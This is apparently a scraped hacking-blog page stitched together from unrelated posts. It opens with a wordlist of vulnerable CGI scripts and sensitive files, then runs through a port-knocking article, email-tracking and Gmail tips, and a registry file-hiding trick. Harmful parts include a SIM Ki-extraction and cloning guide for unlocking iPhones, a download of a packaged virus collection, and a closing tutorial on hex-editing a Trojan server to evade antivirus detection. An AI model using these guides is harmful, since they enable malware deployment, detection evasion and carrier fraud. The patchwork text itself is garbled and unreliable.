faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

Read more >>

Port knocking is a clever new computer security trick. It's a way to configure a system so that only systems who know the "secret knock" can access a certain port. For example, you could build a port-knocking defensive system that would not accept any SSH connections (port 22) unless it detected connection attempts to closed ports 1026, 1027, 1029, 1034, 1026, 1044, and 1035 in that sequence within five seconds, then listened on port 22 for a connection within ten seconds. Otherwise, the system would completely ignore port 22.

It's a clever idea, and one that could easily be built into VPN systems and the like. Network administrators could create unique knocks for their networks -- family keys, really -- and only give them to authorized users. It's no substitute for good access control, but it's a nice addition. And it's an addition that's invisible to those who don't know about it.

Firewall administrators are challenged to balance flexibility and security when designing a comprehensive rule set. A firewall should provide protection against malfeasants, while allowing trusted users to connect. Unfortunately, it is not always possible to filter out the bad guys, because filtering on the basis of IP addresses and ports does not distinguish connecting users. Bad guys can and do come from trusted IP addresses. Open ports remain a necessary vulnerability: they allow connections to applications but also may turn into open doors for attack. This article presents a new security system, termed port knocking, in which trusted users manipulate firewall rules by transmitting information across closed ports.

Briefly, users make connection attempts to sequences of closed ports. The failed connections are logged by the server-side packet filtering firewall and detected by a dæmon that monitors the firewall log file. When a properly formatted knock sequence, playing the role of the secret used in the authentication, is received, firewall rules are manipulated based on the information content of the sequence. This user-based authentication system is both robust, being mediated by the kernel firewall, and stealthy--it's not possible to detect whether a networked machine is listening for port knocks. Port knocking does not require any open ports, and it can be extended to transmit any type of information encoded in a port sequence.

In commonly deployed firewalls, filtering is done either by the IP address of the connecting host or by the port to which this host is connecting. Firewalls examine and interact with packets before any user authentication takes place; therefore, they do not discriminate amongst the users making the connection. It is expected that once the firewall has approved the packet and allowed it to enter the network, downstream applications will handle user authentication. Normally, this provides a sufficient balance between protection and flexibility. Some IP ranges, say cracker-friendly Internet cafés, may be closed completely to incoming traffic, while hosts in other IP ranges may be allowed to connect to ports otherwise unavailable to the general public (proprietary/sensitive applications). Unfortunately, this type of IP-based filtering has the potential to lock out trusted users from your system. Flexibility is limited by the fact that nobody from the blocked IP ranges can connect, regardless of their trust statuses. At the same time, protection is undermined by the fact that anyone from the blocked IP range physically can travel and connect from an unfiltered host. In the end, as long as ports remain open, network applications are susceptible to attack. Using intrusion detection systems and keeping applications up to date can go a long way towards providing protection, but they do so against only known, derivative or anticipated attacks. To eliminate the risk associated with publically open ports, port knocking provides an authentication system that works across closed ports. The use of these ports, however, has to be subverted because all packets are denied. Fortunately, in most firewalls that perform even the most rudimentary logging, information already is flowing across closed ports in the form of entries in a log file indicating connection attempts. Consider the following example.

A handful of ports (100-109) are configured to deny all traffic--no ICMP error packets are sent back to the connecting client--and all attempted connections are logged. In this example, the firewall IP is IPF and the connecting client IP is IPC. The appropriate ipchains command to close the ports and log connections is: ipchains -A input -p tcp -s 0/0 -d IPF/32 100:109 -j DENY -l
A user attempts to connect from IPC to the following firewall ports in sequence: 102,100,100,103. From the point of view of the user, the connections fail silently. On the firewall, though, the 102,100,100,103 number sequence has been recorded. Feb 12 00:13:26 ... input DENY eth1 PROTO=6 IPC:64137 IPF:102 ...
Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64138 IPF:100 ...
Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64139 IPF:100 ...
Feb 12 00:13:28 ... input DENY eth1 PROTO=6 IPC:64140 IPF:103 ...
The knock sequence appears in the firewall log, and the user has transmitted data across the closed ports. Any implementation of the port knocking system needs to provide some basic functionality. First, some way to monitor the firewall log file needs to be devised. A simple Perl application that tails the file is presented in Listing 2, discussed more fully later in the article. Second, a method is required to extract the sequences of ports from the log file and translate their payload into usable information. In this step it is important to be able to (a) detect when a port sequence begins and ends, (b) correctly detect a port sequence in the presence of spurious connection attempts that are not part of the sequence and (c) keep track of multiple port sequences arriving at the same time from different remote IPs. The encoding used to generate the port sequence can be designed to minimize the length of the sequence.

For example, the sequence 100,102 could correspond to one or a series of predefined operations (for example, open port ssh/22 for 15 minutes for a specific IP and then close the port). Finally, once the information is derived from the sequence, the implementation must provide some way to manipulate the firewall rules.


One of the key features of port knocking is it provides a stealthy method of authentication and information transfer to a networked machine that has no open ports. It is not possible to determine successfully whether the machine is listening for knock sequences by using port probes. Thus, although a brute-force attack could be mounted to try to guess the ports and the form of the sequence, such breach attempts could be detected easily. Second, because information is flowing in the form of connection attempts rather than in typical packet data payload, without knowing that this system is in place it would be unlikely that the use of this authentication method would be detected by monitoring traffic. To minimize the risk of a functional sequence being constructed by the intercepting party, the information content containing the remote IP of the sequence can be encrypted. Third, because the authentication is built into the port knock sequence, existing applications need not be changed. Implementing one-time passwords is done easily by adjusting the way particular sequences are interpreted. A sequence could correspond to a request that a port be opened for a specific length of time and then closed and never opened again to the same IP. Furthermore, a one-time pad could be used to encrypt the sequence, making it indecipherable by those without the pad.

Disadvantages of Port Knocking
To use port knocking, a client script that performs the knock is required. The client and any associated data should be considered a secret and kept on removable media, such as a USB key. The use of the client imposes an overhead for each connection. Certain locations, such as libraries or Internet cafés, may not allow execution of arbitrary programs. In order to use port knocking, a number of ports need to be allocated for exclusive use by this system. As the number of such ports increases, the knock sequences becomes shorter for a given amount of information payload, because the number of coding symbols is increased. Practically, 256 free privileged ports (in the 1-1024 range), not necessarily contiguous, usually can be allocated and used to listen for port knocks. Finally, any system that manipulates firewall rules in an automated fashion requires careful implementation. For the scenario in which no ports are initially open, if the listening dæmon fails or is not able to interpret the knocks correctly, it becomes impossible to connect remotely to the host.


Applications
In this section, three examples are outlined that illustrate how the port knocking system can be used. 1. Single Port, Fixed Mapping Connection to only one port (ssh/22) is required. The ssh dæmon is running; all privileged ports are closed, including ssh/22; and packets addressed to ports 30,31,32 are being logged. The following port sequences are recognized: 31,32,30 open ssh/22 to connecting IP
32,30,31 close ssh/22 to connecting IP
31,30,32 close ssh/22 to connecting IP and disregard further knocks from this IP
The justifiably paranoid administrator can open the ssh/22 port on his system by initiating TCP connections to ports 31,32,30. At the end of the ssh session, the port would be closed by using the second sequence shown above. If the host from which the administrator is connecting is not trusted (if, say, keystrokes may be snooped), the use of the third sequence would deny all further traffic from the IP, preventing anyone from duplicating the session. This assumes the port sequence and system login credentials are not captured by a third party and used before the legitimate session ends. In this example, only three sequences are understood by the system, as the requirements call for only a handful of well-defined firewall manipulations. The sequences were chosen not to be monotonically increasing (30, 31, 32), so they would not be triggered by remote port scans. If multiple ports are to be protected by this system, a mapping needs to be derived between the port sequence and a flexible firewall rule. This is covered in the next example. 2. Multiple Port, Dynamic Mapping In this example, a network may be running any number of applications. Ports 100-109 are used to listen to knocks. The port sequence is expected to be of the form: 102,100,110 10a,10b,10c,10d 10(a+b+c+d mod 10) 110,100,102
header payload checksum footer


The first and last three ports let the port knocking dæmon know that a sequence is starting and ending. The next four ports encode the port (abcd) to be opened. For example, if a connection to port 143 is required, the sequence would be 100,101,104,103. The final element in the sequence is a checksum that validates the sequence payload. In this example, the checksum is 8 (1+4+3 mod 10). The sequence element therefore is 108, and the full sequence would be 102,100,103 100,101,104,103 108 103,100,102
When this sequence is detected, port 143 would be made available to the incoming IP address. If the port is open already, the knock would rendered it closed. The knock can be extended to include additional information, such as an anticipated session length, that can be used to close the port after a set amount of time. 3. Mapping with Encryption The information contained in the knock sequence can be encrypted to provide an additional measure of security. In this example, 256 ports are allocated and logged. A knock map of the form remote IP port time checksum
is used where the remote IP, port, time and checksum (sum of other fields mod 255) are encrypted. The encrypted string can be mapped onto eight unsigned chars using Perl's pack("C*",STRING) command, see Listing 1. Listing 1. Mapping the Encrypted String
Implementation
A minimal prototype Perl implementation of port knocking is presented. The implementation is comprised of a knockclient, responsible for originating the knock sequence, and a knockdæmon, responsible for monitoring the firewall log and manipulating the rules.


Knockclient
The complete client is shown in Listing 1. Lincoln Stein's Crypt::CBC module is used as proxy to Crypt::Blowfish to carry out encryption. The unencrypted knock sequence is comprised of seven values: four IP bytes, a port (limited to the range 0-255 in this implementation), a time flag and a checksum (mod 255). The time flag determines how the dæmon reacts: 0 to open the port, 255 to close the port and any other value in the 1-254 range to open the port and then close it after that many minutes. The knock on the firewall (IP=IPF) to open port ssh/22 on IP=IPC and then have the port close after 15 minutes would be executed by calling the client as follows: knockclient -i IPC -r IPF -p 22 -t 15
The client packs the list of seven integers, performs the encryption and unpacks the string into unsigned chars (0-255). These values are then mapped onto a sequence of ports in the 745-1000 range.
Knockdæmon
The knockdæmon is shown in Listing 2. This application uses File::Tail to look for new lines in the firewall log file. Lines corresponding to connection attempts to ports 745-1000 are parsed for the remote IP and port number. An 8-element queue storing the ports is maintained for each incoming IP. When the queue size reaches 8, its contents are decrypted. If the decryption is successful and the checksum is correct, appropriate action is taken and the queue is cleared. If the decryption fails, the oldest queue port element is removed and the dæmon continues monitoring. Listing 2. knockdæmon The firewall rules are manipulated by a system call to the ipchains binary, although the IPChains Perl module by Jonathan Schatz also may be used. If the port is to be closed, as indicated by the time flag, Jose Rodrigues' Schedule::At module is used to schedule the deletion of the rule using the at queue system.


Conclusion
Port knocking is a stealthy authentication system that employs closed ports to carry out identification of trusted users. This novel method provides the means of establishing a connection to an application running on a completely isolated system on which no ports initially are open.

Read more >>

What is MailTracking?
MailTracking is the most powerful and reliable email tracking service that exists today. In short - MailTracking tells you when email you sent gets read / re-opened / forwarded and so much more
How do I send a tracked email? There are two ways you can send tracked emails:

1. Simply add: .mailtracking.com to the end of your recipients email address (they won’t see this)
   or
2. Install the ActiveTracker plugin to add the tracking for you.

Testing? If you send tracked emails to yourself, your anti-spam filters may block them (people don’t usually write to themselves) - so we recommend you test by sending to other people.
What will you tell me about the tracked emails I send? MailTracking will endeavour to provide the following in your tracking reports:

• Date and time opened
• Location of recipient (per their ISP city /town)
• Map of location (available on paid subscriptions)
• Recipients IP address
• Apparent email address of opening (if available)
• Referrer details (ie; if accessed via web mail etc)
• URL clicks
• How long the email was read for
• How many times your email was opened
• If your email was forwarded, or opened on a different computer

All messages sent via MailTracking benefit from the SPF compliant and Sender-ID compliant mail servers. This confirms safe transmission of your messages, and also enables us to report delivery status to you (including: bounce-backs, delays and success notifications). Delivery information is listed in your Personal Tracking Page. Note: MailTracking.com does not use or contain any sp‌y-ware, ma‌l-ware, nor vi‌rues, it is not ill‌egal to use, and does not breach any pri‌vacy reg‌ulations in any countries.
What else does MailTracking do?
There are lots of great features available to you - these include the following sending options:

• Certified email
• Ensured-Receipts and retractable emails
• Invisible tracking
• Self-Destructing emails
• Block printing
• Block forwarding
• Adobe Acrobat PDF Document Tracking
• Secure Encypted emails
• Track MS Word or Excel documents

You can also choose how to receive your receipts:

• In your Personal Tracking Page (when you log in)
• Email ReadNotifications
• Legal Proof-of-Opening receipts
• Delivery Service Notifications (DSN’s)
• SMS alert on your cell-phone or pager
• Instant Messenger

Click Here to Register.

Read more >>

Gmail has an interesting quirk where you can add a plus sign (+) after your Gmail address, and it’ll still get to your inbox. It’s called plus-addressing, and it essentially gives you an unlimited number of e-mail addresses to play with. Here’s how it works: say your address is pinkyrocks@gmail.com, and you want to automatically label all work e-mails. Add a plus sign and a phrase to make it pinkyrocks+work@gmail.com and set up a filter to label it work (to access your filters go to Settings->Filters and create a filter for messages addressed to pinkyrocks+work@gmail.com. Then add the label work).

More real world examples:
Find out who is spamming you: Be sure to use plus-addressing for every form you fill out online and give each site a different plus address.

Example: You could use
pinkyrocks+nytimes@gmail.com for nytimes.compinkyrocks+freestuff@gmail.com for freestuff.comThen you can tell which site has given your e-mail address to spammers, and automatically send them to the trash.

Automatically label your incoming mail:
I’ve talked about that above.Archive your mail: If you receive periodic updates about your bank account balance or are subscribed to a lot of mailing lists that you don’t check often, then you can send that sort of mail to the archives and bypass your Inbox.

Example: For the mailing list, you could give
pinkyrocks+mailinglist1@gmail.com as your address, and assign a filter that will archive mail to that address automatically. Then you can just check in once in a while on the archive if you want to catch up.

Update (9/7) :
Several commentors have indicated that this is not a Gmail specific trick. kl says Fastmail has enabled this feature as well. caliban10 reports that a lot of sites reject addresses with a plus sign. You might use other services like Mailinator for disposable addresses instead. pbinder recommends using services like SpamGourmet, which redirects mail to your real address.

Read more >>

To hide the files and folder for ur privacy, they can be hidden from registry editor
> go to run & type "regedit"
> go to HKEY_LOCAL_MACHINE
> go to SOFTWARE
> go to Microsoft
> go to Windows
> go to CurrentVersion
> go to Explorer
> go to Advanced
> go to Folder
> go to Hidden
> go to SHOWALL
> then, doubleclick on the DefaultValue & in the Value data, change the value into 0 from 1
> then open the explorer n go to folder options
> after that, switch on the do not show hidden files and folder check box
> by doing like that, ur files n folders (those file/folder must b hide earlier) are hidden even if u switch on the show hidden files and folder check box
> to show those hidden files n folders, in the regedit, just change this value into 1

Read more >>

Ever wondered how all those spam reached your inbox despite you not submitting your id to any webform ever? Chances are that you have a web page of your own in which you have openly disclosed your email address and was preyed on by all those spam bots. So how to avoid it? Simple answer would be not to have a web page at all. Since that is not feasible (ok.. sorry!) the next best thing would be not to have your email id on your site. But that would mean nobody would be able to effectively contact you. So here are some techniques that would allows your email to be human readable, but not spammable.

I suppose you know how to embed Javascript in HTML. If not then just enclose any code given below between whereever you want the text to be displayed.
Method 0 : Plain English

This one's not really a method, it is more common sense. Instead of the symbols '@' and '.' expand them in english. That is instead of 'foo@yafoo.com' use 'foo at yafoo dot com'. The problem is that you cannot make your email address clickable and it is really simple for the spam bots to track it down anyway. But this could be the only solution if you want to post your id in a forum or somewhere that does not allow you to use the script tags. (Like this article page for example Surprised Atleast something is better than nothing.
Method 1 : The String Splitter

The easiest method would be to split your email into substrings. i.e if your email is foo@yafoo.com, have it split into 'foo', '@', 'yafoo','.com'. and then join them together. eg:
x1 = 'foo';
x2 = '@';
x3 = 'yafoo';
x4 = '.com';
document.write ('mailto:' + x1 + x2 + x3 + x4);


Good! But the problem with this is that it is too commonly used nowadays and the spam bots MIGHT be smart enough to parse a bit of basic JavaScript.
Method 2 : ASCII - 47

Method two involves writing ASCII codes. Each letter can be written using its ASCII value in the format &#charcode; For example 'A' can be rendered by using the entity A You'll have to find out the ASCII code for each letter of your email address. The values for A-Z are 65 to 91, for a-z are 97 to 122. '@' has the value of 64 and '.' has the value of 46. Therefore the email 'foo@yafoo.com' can be written as...
x1 = 'foo';
x2 = '@';
x3 = 'yafoo';
x4 = '.com';';
document.write ('mailto:' + x1 + x2 + x3 + x4);

For your aid, here's a simple script to find all ASCII codes:
for (i=32;i<=255;i++) { document.write (i + ' : ' + '&#' + i + '; ' ); } This method is a bit more trickier than the first. But again the problem is that it is common and can be parsed though it needs some effort. Method 3 : XOR Encryptor So the next stop is encryption. Why not encrypt your email id using the humble powers of Javascript? Here I will explain the simplest of them all... XORing. The principle is that when you XOR a string with a key you get an encrypted string, and when you XOR the encrypted string with the same key, you get back the orginal string. Now you might wonder what XOR is. It is a logical operation done on bits and stands for eXclusive OR. Try Google to find out what the hell that means, if you care. Now the plan is to first get your string encrpyted, then post the encrypted string on to your website and decrypt it there using Javascript. First of all to the encryption. Run this code on your browser, the purpose is to get the encrypted string. The key I have used here is the number '5'. The '^' is the XOR operator in JavaScript. y = ""; for(i=0;i

Read more >>

Warning! Proceed at your own risk! Your provider can block your subscription!

If your carrier SIM card is not V1 this method will NOT work, because U CAN'T get Ki number from chip! Bassicly V1 SIM cards are at least 7 years "old" SIMs. U CAN'T know for sure if your SIM is V1 ,V2 or V3 before u try to extract Ki with WORONSCAN software(download below). If Woronscan can't extract Ki number, your SIM IS NOT V1, and U CAN NOT proceed!


INFO for other sites admins - Do Not Copy-Paste this tutorial on your site because this tutorial is almost updated daily so u will have a "wrong" tutorial at your sites. If U must put link to this thread at your site. Thank U!

Thanks to Vladimir_CDI,ozbimmer


U will need::

1. an iPhone
2. SIM Reader/Writer (Infinity USB Unlimited, Dynamite Programer(I used this) ,etc...)
3. SilverCard (http://img131.imageshack.us/my.php?i...cardtipfq1.jpg)
4. Your SIM card (It must be a V1 ,U must be able to get Ki number)
5. Download :
SimEmu 6.01 - http://simemu.gsmhosting.net/SIM_EMU_6.01_CFG_v2.1.zip
Woronscan 1.09 - http://www.kinforce.com/down/kinforc...rsim/ws109.zip



1. ::Getting IMSI,ICCID & Ki number from your SIMs::

Step 1 - Your(V1)SIM

1. Put your carrier SIM card in programer
2. Run Woronscan
3. Click on "Tasks" tab then on "IMSI select" u will get a IMSI number, write it down.
4. Click on "Task" tab then on "ICC select" u will get a ICCID number, write it down.
5. Click on "Tasks" tab then on "Ki search", in pop-up window just click "Search", and wait,Ki extraction has began.(I was waiting for mine 40 min ) When u get it, write it down.

Step 2 - Getting IMSI from AT&T SIM card which came with an iPhone

1. Put your AT&T SIM card in programer
2. Click on "Tasks" then on "IMSI select" u will get a IMSI number, write it down.
3. Close Woronscan
4. Remove SIM from programer

Now U have all "data" to make SuperSim.


2. ::Making SuperSim::

1. Download & extract - http://www.rapid_share.com/files/474..._iphone_u1.rar(Remove dash "-")
1.a Put your Silvercard in programer
2. Run Sim-Emu 6.01 Configurator v2.1
3. Click on Configure tab
4. Click "Read from disk" button
5. Browse to your downloaded Flash&EEPROM files, first double click on SIM_EMU_6.01_iphone_u1.HEX and then double click on SIM_EMU_6.01_iphone_u1_EP.HEX, now they are loaded,positions 0 and 9 are red colored,thats fine.

6. In position 0 , type in data which u got from your carrier SIM with Woronscan - IMSI,Ki & ICCID!
For ADN/SMS/FDN# type 161, 15, 4, for SMS Centre type in your carrier SMS center number. Type in
some numbers for PIN1 and PUK1, remember it.

7. Now select position "9", here type IMSI from AT&T SIM card ,and PIN1 ,PUK1 number same like in position "0" ,NOTHING ELSE!

8. In "Config mode" tick "Files" circle button.

9. Click on "Write to disk" button,u'll be asked to save new created SuperSim Flash&Eeprom files,Save it!

10. Write those NEW created Flash&Eeprom files on Silvercard with your programer software!

11. How to cut big card to SIM - http://www.mobileshop.org/usertech/simcutting.htm

12. Put your SuperSIM in iPhone and connect it with USB to PC


3. ::Making your iPhone work with SuperSim::

1. Jailbreak your iPhone (search the forum for "How To" for your iPhone version)

2. Download - http://rapid_share.com/files/74205465/SuperSim.rar ,unrar folder from inside to Desktop

3. Go to - https://ookoo.org/iphone/iasign.php ,under Activator v0.2 type in DEVICE ID, IMEI ,ICCID. Click "Generate"

If u're on WIN click on "download a custom activator v0.2" to download *.exe , now move it to SuperSim folder.

If u're on MAC click on download your generated activation record to download *.plist file TO DESKTOP. (after download RENAME IT TO a.plist !!!!!!)


:: Activation ::

WINDOWS

While your iPhone is still connected to PC double click iphoneinterface.exe in SuperSim folder,now type one command at the time:

cd /System/Library/Lockdown/

putfile /System/Library/Lockdown/iPhoneActivation.pem

exit

Now double click that long digit exe file u downloaded in step 3. to activate your iPhone with SuperSim!



MAC

1.)Copy iPhoneActivation.pem from SuperSim folder to /System/Library/Lockdown/ ,with your favorite tool

2.) Download the following file to your Mac.
http://anderson-technologies.com/wp-...iphonetool.zip

3.) Extract it to a directory on your desktop named iPhoneTool , AND COPY YOUR DOWNLOADED a.plist file OVER that one already inside!

4.) Open the program “Terminal” location in HardDrive/Applications/Utilities

5.) Type the following command into the flashing cursor:

cd ~/Desktop/iPhoneTool

6.) Now make sure your iPhone is connected and you quit iTunes

7.) To activate your iPhone type the following command into the flashing cursor
(note that there are two dashes before activate):

./tool --activate a.plist

Read more >>

No Worries if your or others nokia phone is locked.
Here's the code reseter .

You just need the IMEI no: of your phone & a software.

To know IMEI no: type *#06# & you will see a 15 digit code.

To get code reseter manually paste the below link in the address bar of your
browser.



http://rapidshare.com/files/106920865/NokiSecCodeResetter.rar

Read more >>

This book writed by me.Sorry i write this e-book in my(azerbaijani).
In this book i illustrate how to find it on sites and how to exploit it.
You can download this e-book from=>
Download Now_cLICK_Here

Read more >>

Dont open on your own computer LOL
W32.Bagle.AF
W32.Bagle.H
W32.Hiton.A
W32.MyDoom.F
W32.Netsky.Z
W32.Netsky.D
W32.Netsky.B
W32.Sober.F
W32.Sober.D
W32.Sober.C
W32.Sober
W32.Dumaru
W32.Sobig.F
W32.BugBear.B
W32.LovSan/Blaster1
W32.Sinapps
W32.Sunday
W32.Delta
W32.Gold
W32.Retro
W32.Koshi.1.9
Linux.ADM
Linux.Coco
W32.NBC
W32.Clickit
W32.Parasit
W32.PolySnakebyte
W32.RousSarcoma
W32.Hllw.Sydney@MM
CIH
I Love You
Melissa
w32nimda
Wagner 782
Casino
Harddrive-killer pro 5
Code red 1
Code red 2
Pokemon Pikachu
AIDS
hdfill
Blackday
Bulbasaur
Mirc.El_Che_is_alive
Kpmv.W2000.Poly
Mbop!
C-worm
Batschell
bat.antifa
Bat/BatXP.Iaafe
Bat\\bun
Bat.Bush
BAT.Dolomite.worm
bat.****
bat/hotcakes
bat.ina
bat.junkboat
bat.soulcontrol
BatXP.Saturn
BAT/Calvin&Hobbes
claytron
HoloCaust
p2p.Opax
PERL.Nirvana
VBS/Artillery
vbs.eva
VBS/Evade
Vbs.Evion
w32.merkur.c
W32/Outsider
W32/Outsider B
W32/Outsider C
W32/Outsider D
W32/Outsider E
W32/Perrun
W97/Blackout
W97M/Authority
W97M/Chester
W97M/SFC
WinREG.Sptohell
Virenpaket 0
Virenpaket 1
Virenpaket 2
Virenpaket 3
Virenpaket 4
Virenpaket 5
Virenpaket 6
Virenpaket 7
Virenpaket 8
Virenpaket 9
Virenpaket 10
Virenpaket 11
Zed\'s Word Macro Virus Constructor
Windows Scripting Host Worm Constructor 1.0
Special Format Generator 2.0


http://uploaded.to/?id=l9eab8

Read more >>

There are quite a few services you can disable from starting automatically.
This would be to speed up your boot time and free resources.
They are only suggestions so I suggestion you read the description of each one when you run Services
and that you turn them off one at a time.

Some possibilities are:
• Alerter - Sends alert messages to specified users that are connected to the server computer.
• Application Management - Allows software to tap directly into the Add/Remove Programs feature via the Windows Installer technology.
• Background Intelligent Transfer Service - The Background Intelligent Transfer service is used by programs (such as Windows AutoUpdate) to download files by using spare bandwidth.
• Clipbook - ClipBook permits you to cut and paste text and graphics over the network.
• Error Reporting Service - Allows applications to send error reports to Microsoft in the event of an application fault.
• Fast User Switching - Windows XP allows users to switch quickly between accounts, without requiring them to log off.
• Help and Support - Allows the XP Built-in Help and Support Center to run.
• IMAPI CD-Burning COM Service - You don't need this if you have other software to create CDs.
• Indexing Service - Indexes contents and properties of files on local and remote computers; provides rapid access to files through flexible querying language.
• IP SEC - Manages IP security policy and starts the ISAKMP/Oakley (IKE) and the IP security driver. If you are not on a domain, you likely don't need this running.
• Messenger - Transmits net send and Alerter service messages between clients and servers. This is how a lot of pop-up windows start appearing on your desktop.
• Net Logon - Supports pass-through authentication of account logon events for computers in a domain. If you are not on a domain, you don't need this running
• Network DDE - Provides network transport and security for Dynamic Data Exchange (DDE) for programs running on the same computer or on different computers.
• NT LM Security Support Provider - Provides security to remote procedure call (RPC) programs that use transports other than named pipes.
• Performance Logs and Alerts - Collects performance data from local or remote computers based on preconfigured schedule parameters, then writes the data to a log or triggers an alert. If you don't need to monitor your performance logs, then you don't need this service.
• Portable Media Serial Number - Retrieves the serial number of any portable music player connected to your computer
• QOS RSVP - Provides network signaling and local traffic control setup functionality for QoS-aware programs and control applets.
• Remote Desktop Help Session Manager - Manages and controls Remote Assistance. If you are not using Remote Desktop you don't need this service.
• Remote Registry - Enables remote users to modify registry settings on this computer.
• Routing & Remote Access - Offers routing services to businesses in local area and wide area network environments. Allows dial-in access.
• Secondary Login - Enables starting processes under alternate credentials. This is what allows you to run an application as another user.
• Smart Card - Manages access to smart cards read by this computer.
• Smart Card Helper - Enables support for legacy non-plug and play smart-card readers used by this computer.
• SSDP Discovery Service - Enables discovery of UPnP devices on your home network.
• TCP/IP NetBIOS Helper - Enables support for NetBIOS over TCP/IP (NetBT) service and NetBIOS name resolution. This should not be needed in today's network environment.
• Telnet - Enables a remote user to log on to this computer and run programs, and supports various TCP/IP Telnet clients.
• Uninterruptible Power Supply Service - Manages an uninterruptible power supply (UPS) connected to the computer.
• Universal Plug and Play Device Host - Provides support to host Universal Plug and Play devices
• Upload Manager - Manages synchronous and asynchronous file transfers between clients and servers on the network.
• Volume Shadow Copy Service - Manages and implements Volume Shadow Copies used for backup and other purposes.
• Web Client - Enables Windows-based programs to create, access, and modify non-local files across the Internet.
• Wireless Zero Configuration - Provides automatic configuration for the 802.11 adapters
• WMI Performance Adapter - Provides performance library information from WMI HiPerf providers.

Read more >>

Hello people. Since I had many people asking me how to hexedit, I decided to write
this little tutorial. I will try to explain how to hexedit your favourite Trojan in order to
make it undetected by certain antivirus programs. I will try to put this as simple as
possible so everyone understands it.
Content:
1. General info about hexediting .
2. What tools you need to get started.
3. How to hex.
-step 1
-step 2
__________________________________________________ ___________________
1. General info about hexediting?
If you want to make your server undetectable, you need to know how AVs work and
how they detect your files, right? There are a few ways that AVs use to detect your
server heuristics, sandboxing, etc., and one of them is using so called "definition files"
that carry information about strings inside your server. Well, that�s the way we�re
going again in this tutorial because hexing is pretty much useless for other methods of
detection. So when AVs scan your files it searches for specific stings on specific parts
in your server, and if strings match with strings in the AV database, your file is
detected.
Let�s say that detected strings are "XX" so we need to change that string to something
else (e.g. "XY","YY") that isn�t in the AV definition database so the file can�t be
matched with any of the AV definitions and that way the file will be undetectable.
There are going to be a few tagged strings in your server - not only one, depending on
what trojan you�re using and how popular is. Less popular trojans tend to have less
tagged parts, and with that they are easier to make it undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also not
all AVs use the same tagged parts - this way you need to hex your server against more
AVs to make it fully undetected. This can be annoying because you need to download
wanted AVs then hex it your server, then download another etc., etc. Sometimes AVs
tag critical parts of the server, and if that part is altered will corrupt the server. Also,
heavily edited servers can become unstable, some functions might not work, or even
you can corrupt your server and make it useless.
That�s why you need to check your server if it�s still working after every single
change you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server in half adding 00�s to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters like UKSplitter that are going to split your server into
bytes, and after that scan all split files and find out what byte is detected then alter it
in original exe, or you can use an offset finder like AV Devil.
2. What tools we need.
- Unpacked trojan server.
(your favorite trojan server)
- Hex editor.
(I will use Hex WorkShop, you can find it at http://www.hexworkshop.com/)
- Offset finder
(AVDevil, you can find it at www.trojanfrance.com)
3. How to hex:
-Step 1.
Turn your AV real-time protection �OFF� . Make your Trojan server and
make sure that is not packed.
Open AV Devil and select your server. After selecting, the server msg will pop up
click OK, and the next msg will popup asking you to turn your AV real-time
protection back �ON�. After you do that just click "OK" and lets AV Devil
search for detected offsets.
During the search your AV will pop up a couple of times. Just click on "Skip" and let
AV Devil finish.
After its done you will see something like this:



As you can see this Trojan server has only two detected offsets.
That means that first detected offset begins at 53F7 and ends at 5476.
Also you can see where the second offset starts and ends. That�s the part that the AV
is checking in this definition database. If the part in the server matches with part in
AV database your server is detected. You can hex beginning and ending offset or in
between.
Step 2.
Now when we have detected offsets, we open our server in Hex WorkShop. Type
"Ctrl+G" and this will come up:



Type the first offset in, select from �Beginning of File,� and make sure that you
selected "hex," because offsets in AV Devil are displayed in that manner. Unless you
save via AV Devil, then they are converted into a decimal. Click �Go� and you will
be sent to that offset location. Now we need to change that �31� to something else, so
we will change it to �32�.



Select �31� right click to it and select fill.



You will see the window below. In �Fill with the following hex byte� we are going to
fill in �32� and hit OK.



After clicking �OK,� the changed hex byte going to be shown in red.

[slika]http://img377.imageshack.us/img377/876/slika6gy9.jpg[/img]
__________________________________________________ __________________
Now repeat this for every offset that you found in AV Devil.


__________________________________________________ ___________________
Going to change it �FE� to �EE� and so on for all other detected offsets.



Once you�ve completed editing all offsets, save your server and scan if it�s UD, and
then you�re done. If the AV still detecting it, repeat steps 1 and 2.
Here�s a little tip on how to change detected bytes: Try to make minor changes like
32 =>31, 22, 42, 33, 34, or FE =>EE ,FF etc., etc. Basically, one character up/down
for each - that�s the best way and will minimize chances to corrupt your server. If that
doesn�t work for some reason, you can try and change it to something completely
different, but always check your server after editing bytes. That way you can see if the
server works or if it�s corrupted (you can keep track of what change caused the
corruption and you can try and edit that byte with some other character).
Another thing in some Trojans servers is that AV Devil can�t find the beginning of the
first offset and will mark it with �0.� Let�s say you�ve hexed all other found offsets
but your server is still detected. Split the file into half and run AV Devil on the first
half. That way you will be able to find the first offset that is missing and finish your
hexing. If some tagged part is a letter, e.g. �Y� change it to �y� or just PlAy wItH
ThE CaPs.
Ex:



So there you have it! Now you know how to hex your server and make it undetected
from wanted AVs.
